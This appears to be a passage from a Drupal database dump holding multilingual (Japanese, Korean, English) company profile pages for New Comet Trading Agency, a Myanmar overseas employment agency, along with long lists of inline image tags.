data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page16.jpg\" data-align=\"center\" data-entity-uuid=\"db0f80ea-271e-4bc0-85c9-e33617ed58be\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page17.jpg\" data-align=\"center\" data-entity-uuid=\"249cb91a-e2ab-42f1-880d-08e1d3661363\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page18.jpg\" data-align=\"center\" data-entity-uuid=\"1648c123-aec8-4914-94b5-6f74fc86d322\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page19.jpg\" data-align=\"center\" data-entity-uuid=\"1483aff7-adb3-4f9d-bba2-26c25de4af05\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page20.jpg\" data-align=\"center\" data-entity-uuid=\"e8ecf841-902b-4d50-a3db-9e840b757bb0\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page21.jpg\" data-align=\"center\" data-entity-uuid=\"c1febdfa-ff0f-4b40-85b8-662e08593da9\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page22.jpg\" data-align=\"center\" data-entity-uuid=\"2fa91eac-f8ad-4e49-a4ed-f30c44a54f97\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page23.jpg\" data-align=\"center\" data-entity-uuid=\"01f43faf-2b33-446b-b89b-c870d79d8382\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page24.jpg\" data-align=\"center\" data-entity-uuid=\"67b85639-9d9b-4dba-9e7e-104386c5d10b\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page25.jpg\" data-align=\"center\" data-entity-uuid=\"a59b58d5-c9f3-44ec-8705-b4cae7c7abea\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page26.jpg\" data-align=\"center\" data-entity-uuid=\"1ad640d5-c50a-4585-8518-2626580dcf51\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page27.jpg\" data-align=\"center\" data-entity-uuid=\"6ba5b697-692e-4e17-95d5-30299f4c7807\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page28.jpg\" data-align=\"center\" data-entity-uuid=\"ec9ac328-ce1c-4c50-bf7c-cee9f6ffc7bf\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page29.jpg\" data-align=\"center\" data-entity-uuid=\"459f3255-eeea-4f27-952a-43eeef000608\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page30.jpg\" data-align=\"center\" data-entity-uuid=\"b24121df-13a4-4612-ab32-c11ca913e9f2\" data-entity-type=\"file\">', '', 'full_html'),
('page', 0, 23, 263, 'ja', 0, '<p>当社は2004年に設立され、登録ID(295/2004-2005)を取得し、以来サービスの提供を行ってきました。そして、2023年に当社ニューコメットトレンディング海外エージェンシーを設立し、運営を開始しました。<br>当社はニュー コメット トレーディング グループの一部である。その中で最大規模のゼーヤーニューコメット自動車売買&amp;サービス株式会社は自動車の輸入許可を得て、建設現場用のトラックや、交通機関として使われるバスや様々な機械を日本から直接輸入し、販売する事業を25年間続けてきました。納税もきちんと行い、100人の従業員を雇用するまでになりました。<br>また、グループの一部であるニューコメット建築株式会社、ゼッヤシェピーティー建築株式会社、アウンネーウィン建築株式会社も政府から許可を多く受け取り、合わせて200人以上の人材紹介に成功しております。<br>現在、ニューコメットトレンディング海外エージェンシーでは、ミャンマー全国から来た民族を問わずに韓国の造船所で働きたい人たちに対して、シンマライ湾岸で経験豊富な指導者たちの下で訓練を受ける機会を提供し、仕事の紹介を行っています。<br>さらに、ドバイ、マレーシア、シンガポール、タイ、日本への就職もサポートしています。<br>ミャンマーの若者たちが自分らしさを保ちながら、自分に合った仕事を見つけ、日本の技術を学ぶことができるように支援を続けています。日本語能力試験(JLPT, JFT, NAT-TEST, TOP-J)に合格した学生に対しては、ワークビザや研修ビザを取得するための支援を提供しています。<br>我々ニューコメットトレーディング海外エージェンシーは、経験豊富で能力の高い研修生を育成し、海外の仕事チャンスを提供することに尽力して参ります。<o:p></o:p></p><img src=\"/sites/default/files/inline-images/page01.jpg\" data-align=\"center\" data-entity-uuid=\"bb0a6309-0480-4e15-977d-7779b6ab5882\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page02.jpg\" data-align=\"center\" data-entity-uuid=\"3d648acd-e4d6-422e-96ec-0f4ef8a0ddaa\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page03.jpg\" data-align=\"center\" data-entity-uuid=\"b4e48cbd-91b4-4348-a15c-c383659f5dff\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page04.jpg\" data-align=\"center\" data-entity-uuid=\"f62451bb-2aa5-4267-9cf7-76b35949208e\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page05.jpg\" data-align=\"center\" data-entity-uuid=\"f7fdcca7-3b28-4e95-9a70-f8ca466d9476\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page06.jpg\" data-align=\"center\" data-entity-uuid=\"565a7606-51ac-43fc-9c7a-1f2fe7c3935d\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page07.jpg\" data-align=\"center\" data-entity-uuid=\"241602f2-5bf8-4040-8551-8abbc9990697\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page08.jpg\" data-align=\"center\" data-entity-uuid=\"4ee88431-32e2-499a-873a-72b73c80dd87\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page09.jpg\" data-align=\"center\" data-entity-uuid=\"f14ca664-92dd-4ef8-ac3e-6d7665765749\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page10.jpg\" data-align=\"center\" data-entity-uuid=\"1bafeb42-76e2-496a-a9bb-90b065a98e37\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page11.jpg\" data-align=\"center\" data-entity-uuid=\"9e05184a-372e-4ef0-aec6-040a7de4d8b5\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page12.jpg\" data-align=\"center\" data-entity-uuid=\"e5ff5315-6ae9-4838-b6d0-5df07c2ac651\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page13.jpg\" data-align=\"center\" data-entity-uuid=\"d8e1cc86-6131-4a2c-9b1a-387a91c23038\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page14.jpg\" data-align=\"center\" data-entity-uuid=\"9b73fa8d-862d-4337-80d5-bbf9a45b1135\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page15.jpg\" data-align=\"center\" data-entity-uuid=\"99d39ec1-71a6-43ab-9303-45f7f07a6c01\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page16.jpg\" data-align=\"center\" data-entity-uuid=\"db0f80ea-271e-4bc0-85c9-e33617ed58be\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page17.jpg\" data-align=\"center\" data-entity-uuid=\"249cb91a-e2ab-42f1-880d-08e1d3661363\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page18.jpg\" data-align=\"center\" data-entity-uuid=\"1648c123-aec8-4914-94b5-6f74fc86d322\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page19.jpg\" data-align=\"center\" data-entity-uuid=\"1483aff7-adb3-4f9d-bba2-26c25de4af05\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page20.jpg\" data-align=\"center\" data-entity-uuid=\"e8ecf841-902b-4d50-a3db-9e840b757bb0\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page21.jpg\" data-align=\"center\" data-entity-uuid=\"c1febdfa-ff0f-4b40-85b8-662e08593da9\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page22.jpg\" data-align=\"center\" data-entity-uuid=\"2fa91eac-f8ad-4e49-a4ed-f30c44a54f97\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page23.jpg\" data-align=\"center\" data-entity-uuid=\"01f43faf-2b33-446b-b89b-c870d79d8382\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page24.jpg\" data-align=\"center\" data-entity-uuid=\"67b85639-9d9b-4dba-9e7e-104386c5d10b\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page25.jpg\" data-align=\"center\" data-entity-uuid=\"a59b58d5-c9f3-44ec-8705-b4cae7c7abea\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page26.jpg\" data-align=\"center\" data-entity-uuid=\"1ad640d5-c50a-4585-8518-2626580dcf51\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page27.jpg\" data-align=\"center\" data-entity-uuid=\"6ba5b697-692e-4e17-95d5-30299f4c7807\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page28.jpg\" data-align=\"center\" data-entity-uuid=\"ec9ac328-ce1c-4c50-bf7c-cee9f6ffc7bf\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page29.jpg\" data-align=\"center\" data-entity-uuid=\"459f3255-eeea-4f27-952a-43eeef000608\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page30.jpg\" data-align=\"center\" data-entity-uuid=\"b24121df-13a4-4612-ab32-c11ca913e9f2\" data-entity-type=\"file\">', '', 'full_html'),
('page', 0, 23, 263, 'ko', 0, '<p>저희 ``New Comet Trading\'\' 회사는 2004년에 설립되어 사업자등록번호(295/2004-2005)로 영업을 시작하였습니다.<br>뉴코멧 해외직업소개회사는 2023년 외국인고용업 면허를 취득하여 서비스 활동을 시작하였습니다.</p><p><br>저희 뉴코멧 해외직업소개회사 \"New Comet Overseas Employment Agency\"는자매 회사인 &nbsp;제야뉴코멧 자동차 판매 및 서비스 회사, 뉴코멧회사등 기업들과 협력하여 경제통상자원부에서 &nbsp;차량 수입허가를 신청했고 각종 상용트럭, 관광 산업 및 운송에 사용되는 다양한 유형의 버스 및 기계를 일본에서 직접 구매 판매하는 사업을 25년 이상 &nbsp;종사해 왔고 나라를 위한 정한 세금들을 냈습니다. 게다가100 명 이상의 직원에게 고용 기회를 제공했습니다.</p><p><br>또한 쌍둥이 회사인 뉴코멧건설 회사, 제야슈웨삐띡 건설 회사, 아웅네원 회사들은 정부 부처로부터 입찰 (tender)을 받고 건설 작업을 하는 동안 200명 이상의 직원에게 고용 기회를 제공했습니다.</p><p><br>저희 \"뉴코멧 해외 직업 소개회사\"는 한국 조선소로 취업을 희망하는 미얀마 각지에서 온 소수민족 형제들을 교통통신부 산하의 씬마락 (Sinmalike) 조선소에서 유능한 트레이너들와 함께 실력있는 용접공이 되도록 수업을 제공하고 있으며 관련 기업체로 취업할 수 있게 도와주고 있습니다.또한, 두바이, 말레이시아, 싱가포르, 태국, 일본 같은 국가에서 일하기를 원하는 청년들에게 취업 기회를 받알 수 있도록 &nbsp;서비스들을 제공하고 있습니다.</p><p><br>New Comet Trading Agency Co., Ltd.는 미얀마의 젊은 치누들이 일본의 개발한 첨단 기술을 배우고 꿈을 실현할 수 있도록 필요한 교육을 제공하고 돕고 있습니다.</p><p><br>일본으로 취업비자, 연수비자로 가기 위해 필요한 자격시험(JLPT, JFT, NAT-TEST, TOP-J)에 합격할 수 있도록 어학당도 개설 및 교육을 지원하고 있습니다.</p><p><br>저희는”뉴코멧 해외직업소개회사” 는 미얀마에서 우수한 기능인력을 배출하여 해외로 파견하는 서비스를 제공하기 위해 끊임없이 노력하고 있습니다.<o:p></o:p><o:p></o:p></p><img src=\"/sites/default/files/inline-images/page01.jpg\" data-align=\"center\" data-entity-uuid=\"bb0a6309-0480-4e15-977d-7779b6ab5882\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page02.jpg\" data-align=\"center\" data-entity-uuid=\"3d648acd-e4d6-422e-96ec-0f4ef8a0ddaa\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page03.jpg\" data-align=\"center\" data-entity-uuid=\"b4e48cbd-91b4-4348-a15c-c383659f5dff\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page04.jpg\" data-align=\"center\" data-entity-uuid=\"f62451bb-2aa5-4267-9cf7-76b35949208e\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page05.jpg\" data-align=\"center\" data-entity-uuid=\"f7fdcca7-3b28-4e95-9a70-f8ca466d9476\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page06.jpg\" data-align=\"center\" data-entity-uuid=\"565a7606-51ac-43fc-9c7a-1f2fe7c3935d\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page07.jpg\" data-align=\"center\" data-entity-uuid=\"241602f2-5bf8-4040-8551-8abbc9990697\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page08.jpg\" data-align=\"center\" data-entity-uuid=\"4ee88431-32e2-499a-873a-72b73c80dd87\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page09.jpg\" data-align=\"center\" data-entity-uuid=\"f14ca664-92dd-4ef8-ac3e-6d7665765749\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page10.jpg\" data-align=\"center\" data-entity-uuid=\"1bafeb42-76e2-496a-a9bb-90b065a98e37\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page11.jpg\" data-align=\"center\" data-entity-uuid=\"9e05184a-372e-4ef0-aec6-040a7de4d8b5\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page12.jpg\" data-align=\"center\" data-entity-uuid=\"e5ff5315-6ae9-4838-b6d0-5df07c2ac651\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page13.jpg\" data-align=\"center\" data-entity-uuid=\"d8e1cc86-6131-4a2c-9b1a-387a91c23038\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page14.jpg\" data-align=\"center\" data-entity-uuid=\"9b73fa8d-862d-4337-80d5-bbf9a45b1135\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page15.jpg\" data-align=\"center\" data-entity-uuid=\"99d39ec1-71a6-43ab-9303-45f7f07a6c01\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page16.jpg\" data-align=\"center\" data-entity-uuid=\"db0f80ea-271e-4bc0-85c9-e33617ed58be\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page17.jpg\" data-align=\"center\" data-entity-uuid=\"249cb91a-e2ab-42f1-880d-08e1d3661363\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page18.jpg\" data-align=\"center\" data-entity-uuid=\"1648c123-aec8-4914-94b5-6f74fc86d322\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page19.jpg\" data-align=\"center\" data-entity-uuid=\"1483aff7-adb3-4f9d-bba2-26c25de4af05\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page20.jpg\" data-align=\"center\" data-entity-uuid=\"e8ecf841-902b-4d50-a3db-9e840b757bb0\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page21.jpg\" data-align=\"center\" data-entity-uuid=\"c1febdfa-ff0f-4b40-85b8-662e08593da9\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page22.jpg\" data-align=\"center\" data-entity-uuid=\"2fa91eac-f8ad-4e49-a4ed-f30c44a54f97\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page23.jpg\" data-align=\"center\" data-entity-uuid=\"01f43faf-2b33-446b-b89b-c870d79d8382\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page24.jpg\" data-align=\"center\" data-entity-uuid=\"67b85639-9d9b-4dba-9e7e-104386c5d10b\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page25.jpg\" data-align=\"center\" data-entity-uuid=\"a59b58d5-c9f3-44ec-8705-b4cae7c7abea\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page26.jpg\" data-align=\"center\" data-entity-uuid=\"1ad640d5-c50a-4585-8518-2626580dcf51\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page27.jpg\" data-align=\"center\" data-entity-uuid=\"6ba5b697-692e-4e17-95d5-30299f4c7807\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page28.jpg\" data-align=\"center\" data-entity-uuid=\"ec9ac328-ce1c-4c50-bf7c-cee9f6ffc7bf\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page29.jpg\" data-align=\"center\" data-entity-uuid=\"459f3255-eeea-4f27-952a-43eeef000608\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page30.jpg\" data-align=\"center\" data-entity-uuid=\"b24121df-13a4-4612-ab32-c11ca913e9f2\" data-entity-type=\"file\">', '', 'full_html'),
('page', 0, 23, 264, 'en', 0, '<p><span style=\"font-size:14.0pt;line-height:107%;\">We, ``NEW COMET TRADING\'\' company, was established in 2004 and started operating with company registration number (295/2004-2005).</span><o:p></o:p></p><p><span style=\"font-size:14.0pt;line-height:107%;\">NEW COMET TRADING AGENCY Co.,Ltd (New Comet Overseas Employment Agency) licence was obtained in 2023 and since then, the company has started to carry out service activities.</span><o:p></o:p></p><p><span style=\"font-size:14.0pt;line-height:107%;\">&nbsp;We, ``NEW COMET TRADING AGENCY\'\' company, which is a brother company, such as, ZEYA NEW COMET Auto Sale &amp; Services Co.,Ltd, NEW COMET Co.,Ltd, have applied for vehicle import permits from the Ministry of Economy and Commerce, and have been working for more than 25 years in the business of buying, importing and selling various types of business trucks, tourism and transportation buses and machinery directly from Japan, and have paid the taxes set for the state. More than 100 employees were given employment opportunities.</span><o:p></o:p></p><p><span style=\"font-size:14.0pt;line-height:107%;\">In addition, brother companies such as NEW COMET Construction Co.,Ltd, NEW ZAYYA SHWE PYI Construction Co.,Ltd, AUNG NAY WUN Construction Co.,Ltd and other companies have also successfully won tenders from government ministries and have provided employment opportunities to more than 200 employees.</span></p><p><span style=\"font-size:14.0pt;line-height:107%;\">Our company \"NEW COMET TRADING AGENCY “company is currently providing welding training courses to become qualified skilled workers at the Sinmalike Shipyard for ethnic brothers from all over Myanmar who want to work in Korea\'s shipyards and connect them with job opportunities.&nbsp;</span></p><p><o:p></o:p><span style=\"font-size:14.0pt;line-height:107%;\">In addition, we are connecting job opportunities for young people who want to work in countries such as Dubai, Malaysia, Singapore, Thailand, and Japan.</span><o:p></o:p></p><p><span style=\"font-size:14.0pt;line-height:107%;\">We at NEW COMET TRADING AGENCY Co.Ltd, are assisting on responsible for learning about Japan\'s developed advanced technologies, cultures and expressing their personal abilities and goals for the young generation in Myanmar.&nbsp;</span></p><p><o:p></o:p><span style=\"font-size:14.0pt;line-height:107%;\">In order to successfully pass the qualification tests (JLPT, JFT, NAT-TEST, TOP-J) required to go to Japan with a Work Visa and Training Visa, we are opening language training schools and providing teaching support.</span><o:p></o:p></p><p><span style=\"font-size:14.0pt;line-height:107%;\">We, \"NEW COMET TRADING AGENCY\" company, is constantly striving to provide services that produce talented skilled workers from Myanmar and send them to foreign countries.</span></p><img src=\"/sites/default/files/inline-images/1-NC.jpg\" data-align=\"center\" data-entity-uuid=\"1427dc29-05a8-43fe-8ca3-965d16ed0865\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-1_0.jpg\" data-align=\"center\" data-entity-uuid=\"63ac130c-f5fd-4391-982d-9cbf22c9c88b\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-2.jpg\" data-align=\"center\" data-entity-uuid=\"80e04f60-8b31-432d-8034-205f1107df2f\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-3.jpg\" data-align=\"center\" data-entity-uuid=\"e0e57835-6cc3-483a-895d-4d5108e80c57\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-4.jpg\" data-entity-uuid=\"9b3a507c-edd4-4ce3-b1a2-4936996fbe84\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-5.jpg\" data-align=\"center\" data-entity-uuid=\"9eac5e99-94a6-4dab-a71a-c4c7a78b8a7b\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-6.jpg\" data-align=\"center\" data-entity-uuid=\"99025867-1165-45b9-987a-162bd77afc85\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-7.jpg\" data-align=\"center\" data-entity-uuid=\"ab865942-61f8-4761-ac2c-b83b675886cf\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-8.jpg\" data-align=\"center\" data-entity-uuid=\"6eb2dc0f-9c32-4d4f-bb0a-7648ab39ab11\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-9.jpg\" data-align=\"center\" data-entity-uuid=\"810afaf6-ff82-44e0-b231-927e848a41cc\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-10.jpg\" data-align=\"center\" data-entity-uuid=\"3258c9ec-64da-4a37-9e22-cff0a7b23efc\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-11.jpg\" data-align=\"center\" data-entity-uuid=\"0f435fe2-d603-4e29-b1d6-f0cc0a29d626\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-12.jpg\" data-align=\"center\" data-entity-uuid=\"a095c373-2df3-4bba-be96-e259086824d6\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-13.jpg\" data-align=\"center\" data-entity-uuid=\"aeca03e1-f9a3-4e0e-b7b6-1660dbd60c8a\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-14.jpg\" data-align=\"center\" data-entity-uuid=\"99606141-7880-4242-9f8a-39d779b7c3f4\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-15.jpg\" data-entity-uuid=\"ebdb65e0-ba0b-4289-b787-403a08a7137c\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-16.jpg\" data-entity-uuid=\"89d8fc77-4e52-42ff-81bd-8cbddd3dfa5f\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-17.jpg\" data-align=\"center\" data-entity-uuid=\"9f81c640-bf3c-45f2-85d1-72c351c50da7\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-18.jpg\" data-align=\"center\" data-entity-uuid=\"eaba01fe-9f4f-4c78-b4f7-f966c16106b2\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-19.jpg\" data-align=\"center\" data-entity-uuid=\"28845640-721c-4663-99e4-3fe89a3fc124\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-20.jpg\" data-align=\"center\" data-entity-uuid=\"310286d4-6f8d-425b-b758-ba0c7a46a78c\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-21.jpg\" data-align=\"center\" data-entity-uuid=\"2a48e008-54b7-4ada-9bec-ec877fb83f54\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-23.jpg\" data-align=\"center\" data-entity-uuid=\"61230765-b357-46fe-a38d-1699896c48d6\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-25.jpg\" data-entity-uuid=\"e21d162f-6f5a-4935-bbcb-5001a8cba017\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-26.jpg\" data-align=\"center\" data-entity-uuid=\"00ae4e32-0e8a-4187-9efe-abfe0a26501b\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-27.jpg\" data-align=\"center\" data-entity-uuid=\"2989d3e0-2393-49ad-a73e-684f01edf0fa\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-28.jpg\" data-align=\"center\" data-entity-uuid=\"56339d67-286d-4418-9789-87b2f0456386\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-29.jpg\" data-align=\"center\" data-entity-uuid=\"b26a003e-c37f-4b76-bb1a-3b646ab2f771\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-30.jpg\" data-align=\"center\" data-entity-uuid=\"891213d9-115b-4b86-8d26-3ebbbbeb98a8\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-31.jpg\" data-align=\"center\" data-entity-uuid=\"95019304-f6cb-4eaa-90da-ef0d7f51ee47\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-32.jpg\" data-align=\"center\" data-entity-uuid=\"361d538d-8be6-49d8-ae4e-5ac9247fd5b9\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-33.jpg\" data-align=\"center\" data-entity-uuid=\"e46b1924-0cc4-41fc-baa4-df9dd73fbec8\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-34.jpg\" data-align=\"center\" data-entity-uuid=\"809ca92e-91d6-401f-b00b-567cc35ce1c5\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-35.jpg\" data-align=\"center\" data-entity-uuid=\"667d5781-8402-43e6-853f-ec90e796e6c7\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-36.jpg\" data-align=\"center\" data-entity-uuid=\"58b87ffa-6876-47b0-9e6e-d43d2c7aff38\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-37.jpg\" data-align=\"center\" data-entity-uuid=\"7b3b8c38-5bbf-4e74-85eb-618ca90b2db6\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-38.jpg\" data-align=\"center\" data-entity-uuid=\"d0e647b4-4413-4a58-b4cb-91c95524d97f\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-39.jpg\" data-align=\"center\" data-entity-uuid=\"ad197c72-ff23-4b15-b4ad-d15c791e6a77\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-40.jpg\" data-align=\"center\" data-entity-uuid=\"894ca453-d21f-4356-ad3e-bdb7c3e12408\" data-entity-type=\"file\" alt=\"\"><p>&nbsp;</p><p>&nbsp;</p>', '', 'full_html'),
('page', 0, 23, 264, 'ja', 0, '<p>当社は2004年に設立され、登録ID(295/2004-2005)を取得し、以来サービスの提供を行ってきました。そして、2023年に当社ニューコメットトレンディング海外エージェンシーを設立し、運営を開始しました。<br>当社はニュー コメット トレーディング グループの一部である。その中で最大規模のゼーヤーニューコメット自動車売買&amp;サービス株式会社は自動車の輸入許可を得て、建設現場用のトラックや、交通機関として使われるバスや様々な機械を日本から直接輸入し、販売する事業を25年間続けてきました。納税もきちんと行い、100人の従業員を雇用するまでになりました。<br>また、グループの一部であるニューコメット建築株式会社、ゼッヤシェピーティー建築株式会社、アウンネーウィン建築株式会社も政府から許可を多く受け取り、合わせて200人以上の人材紹介に成功しております。<br>現在、ニューコメットトレンディング海外エージェンシーでは、ミャンマー全国から来た民族を問わずに韓国の造船所で働きたい人たちに対して、シンマライ湾岸で経験豊富な指導者たちの下で訓練を受ける機会を提供し、仕事の紹介を行っています。<br>さらに、ドバイ、マレーシア、シンガポール、タイ、日本への就職もサポートしています。<br>ミャンマーの若者たちが自分らしさを保ちながら、自分に合った仕事を見つけ、日本の技術を学ぶことができるように支援を続けています。日本語能力試験(JLPT, JFT, NAT-TEST, TOP-J)に合格した学生に対しては、ワークビザや研修ビザを取得するための支援を提供しています。<br>我々ニューコメットトレーディング海外エージェンシーは、経験豊富で能力の高い研修生を育成し、海外の仕事チャンスを提供することに尽力して参ります。<o:p></o:p></p><img src=\"/sites/default/files/inline-images/page01.jpg\" data-align=\"center\" data-entity-uuid=\"bb0a6309-0480-4e15-977d-7779b6ab5882\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page02.jpg\" data-align=\"center\" data-entity-uuid=\"3d648acd-e4d6-422e-96ec-0f4ef8a0ddaa\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page03.jpg\" data-align=\"center\" data-entity-uuid=\"b4e48cbd-91b4-4348-a15c-c383659f5dff\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page04.jpg\" data-align=\"center\" data-entity-uuid=\"f62451bb-2aa5-4267-9cf7-76b35949208e\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page05.jpg\" data-align=\"center\" data-entity-uuid=\"f7fdcca7-3b28-4e95-9a70-f8ca466d9476\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page06.jpg\" data-align=\"center\" data-entity-uuid=\"565a7606-51ac-43fc-9c7a-1f2fe7c3935d\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page07.jpg\" data-align=\"center\" data-entity-uuid=\"241602f2-5bf8-4040-8551-8abbc9990697\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page08.jpg\" data-align=\"center\" data-entity-uuid=\"4ee88431-32e2-499a-873a-72b73c80dd87\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page09.jpg\" data-align=\"center\" data-entity-uuid=\"f14ca664-92dd-4ef8-ac3e-6d7665765749\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page10.jpg\" data-align=\"center\" data-entity-uuid=\"1bafeb42-76e2-496a-a9bb-90b065a98e37\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page11.jpg\" data-align=\"center\" data-entity-uuid=\"9e05184a-372e-4ef0-aec6-040a7de4d8b5\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page12.jpg\" data-align=\"center\" data-entity-uuid=\"e5ff5315-6ae9-4838-b6d0-5df07c2ac651\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page13.jpg\" data-align=\"center\" data-entity-uuid=\"d8e1cc86-6131-4a2c-9b1a-387a91c23038\" data-entity-type=\"file\"><img 